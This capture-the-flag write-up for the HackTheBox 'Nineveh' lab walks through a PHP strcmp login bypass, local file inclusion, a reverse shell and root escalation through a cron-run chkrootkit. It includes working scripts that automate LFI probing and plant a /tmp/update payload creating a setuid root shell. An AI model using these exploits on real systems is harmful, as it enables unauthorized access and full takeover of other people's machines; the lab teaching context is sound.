HackTheBox_Nineveh w/o Metasploit
HTB - Nineveh
Enumeration
Nmap Scan Results
Supported HTTP Methods
Dirbusting Results for HTTP
Dirbusting Results for HTTPS
We have to specify the -k flag to skip TLS certificate verification
Visiting the Page
Vulnerabilities
phpLiteAdmin v1.9 Vulnerability
Exploitation
Brute-Forcing phpLiteAdmin Login Page
We obtained the password 123. Let’s log in with it and see what’s there.
We are greeted with a page where we can infer that there is a database named test with no tables.
PHP Injection Exploit
Accessing the Page from Earlier
Intercepting the login in Burp Suite shows the POST body. We assume the check behind it is a plain strcmp() of the submitted password against a hard-coded value: strcmp() returns 0 when the two strings are equal, and the code most likely tests for that with a loose comparison (== 0). If one argument is not a string at all, for example an array, PHP (before 8.0) emits a warning and strcmp() returns NULL, and under loose comparison NULL == 0 is true, so the check passes without knowing the password. We can hand the script an array simply by renaming the field in the POST data from password=... to password[]=... and resending the request.
And boom, we’re in:
Local File Inclusion (LFI) Check
On the notes page, the file name is passed in the notes parameter of the URL, so let’s check for LFI.
| notes parameter value | Result |
|---|---|
| ninevehNotes.txt | No error, displays note |
| /etc/passwd | No Note is selected. |
| ../../../../../../../../../../etc/passwd | No Note is selected. |
| ninevehNotes | Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31 |
| ninevehNote | No Note is selected. |
| files/ninevehNotes/../../../../../../../../../etc/passwd | File name too long. |
| files/ninevehNotes/../../../../../../../etc/passwd | The contents of /etc/passwd |
| /ninevehNotes/../etc/passwd | The contents of /etc/passwd |
So the only filter is a substring check: as long as ninevehNotes appears somewhere in the parameter, the value is passed to include(). The path is normalised before it is opened, which is why a nonexistent ninevehNotes directory component followed by ../ still lets us reach any file the web server can read. Let’s use this to include the PHP shell we created earlier.
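As an added example (not part of the original writeup), the following script automates the probing done by hand in the table above: it generates payloads that keep the required ninevehNotes token, sends them with curl, and classifies each response by the error strings observed. The target URL and the payload shapes are assumptions taken from the table; nothing is contacted unless a file argument is given.

```shell
#!/bin/sh
# Added example: probe the manage.php "notes" parameter for LFI.
# BASE_URL is an assumed target; override it in the environment.
BASE_URL="${BASE_URL:-http://10.10.10.43/department/manage.php}"

# Candidate payloads for reading an absolute file ($1, e.g. /etc/passwd).
# Both keep the "ninevehNotes" token so the substring check passes; they are
# the two shapes the table above showed working.
lfi_payloads() {
    target=$1
    printf '%s\n' \
        "/ninevehNotes/..$target" \
        "files/ninevehNotes/../../../../../../..$target"
}

# Map a response body to a verdict, mirroring the messages in the table.
# Anything that is not a known error is treated as included content and
# should be checked by hand.
classify() {
    case "$1" in
        *"File name too long"*)      echo too_long ;;
        *"failed to open stream"*)   echo include_failed ;;
        *"No Note is selected."*)    echo filtered ;;
        "")                          echo empty ;;
        *)                           echo content ;;
    esac
}

# Fetch one payload and print "<verdict> <payload>".
probe() {
    payload=$1
    body=$(curl -s -G "$BASE_URL" --data-urlencode "notes=$payload")
    printf '%s %s\n' "$(classify "$body")" "$payload"
}

# Only contact the target when run as a script with a file argument,
# e.g.  ./lfi_probe.sh /etc/passwd
if [ -n "${1:-}" ]; then
    lfi_payloads "$1" | while IFS= read -r p; do probe "$p"; done
fi
```

Run it against other files the web server can read (Apache configuration, the manage.php source itself) to confirm the traversal is not limited to /etc/passwd.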
Command Execution Check
Let’s check for command execution with ls.
We can execute commands. Let’s try getting a reverse shell with Burp Suite now.
URL Encoded Reverse Shell Code
Nice, we have access as www-data. Now let’s escalate our privileges.
Privilege Escalation
Upgrading the Shell
Uploading and Running LinEnum
Let’s serve LinEnum.sh from an HTTP server on our machine and fetch it onto the target.
Exploring the amrois Folder
We can enter the amrois home folder but can’t read the flag. Let’s look around more.
The amrois user has access only to this folder.
Checking for Cron Jobs
New reports appear every minute, which suggests a cron job is generating them.
Since we can’t read root’s crontab, let’s write a small process monitor that diffs the process list every second and prints whatever appears or disappears, so a short-lived cron job shows up.
```bash
#!/bin/bash
# procmon.sh: poll the process list once a second and print lines that
# appeared (>) or disappeared (<) since the previous sample.
IFS=$'\n'                      # loop by line, not by word
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    # only the changed lines of the diff are interesting
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done
```
Save it as procmon.sh on the target, make it executable with chmod +x procmon.sh, and run it with ./procmon.sh.
Identifying Vulnerabilities in Chkrootkit
The monitor shows the cron job executing /usr/bin/chkrootkit as root.
Chkrootkit vulnerabilities:
Using the identified vulnerability:
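As an added example, not the writeup’s own steps, the script below abuses the best-known chkrootkit privilege escalation: affected versions (0.49 and earlier, CVE-2014-0476) execute /tmp/update as root whenever chkrootkit runs. The page does not state the installed version, so this assumes it is an affected one; check chkrootkit -V before relying on it. The payload drops a setuid copy of bash and the script waits for the cron run to create it.

```shell
#!/bin/sh
# Added example: chkrootkit /tmp/update privilege escalation.
# Assumes a chkrootkit version affected by CVE-2014-0476 is run by cron as root.

# Write the file chkrootkit will execute as root: it creates a setuid bash.
# $1 is the directory that receives "update" (normally /tmp; parameterised so
# the function can be exercised elsewhere). Prints the path written.
write_update() {
    dir=${1:-/tmp}
    f="$dir/update"
    cat > "$f" <<'EOF'
#!/bin/sh
cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash
EOF
    chmod 755 "$f"
    printf '%s\n' "$f"
}

# Poll until the setuid shell appears. The cron job runs about once a minute,
# so this normally returns within a couple of minutes; returns 1 on timeout.
wait_for_rootbash() {
    tries=${1:-150}
    while [ "$tries" -gt 0 ]; do
        [ -u /tmp/rootbash ] && return 0
        sleep 1
        tries=$((tries - 1))
    done
    return 1
}

# Usage: ./chkrootkit_pe.sh run
# bash -p keeps the effective uid instead of dropping it on startup.
if [ "${1:-}" = "run" ]; then
    write_update /tmp
    wait_for_rootbash && exec /tmp/rootbash -p
fi
```

Because the payload runs under root’s environment from cron, it must not depend on the current user’s PATH or a terminal; copying a shell and setting the setuid bit is the simplest thing that survives that.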
We have obtained root privilege. Let’s grab our flags.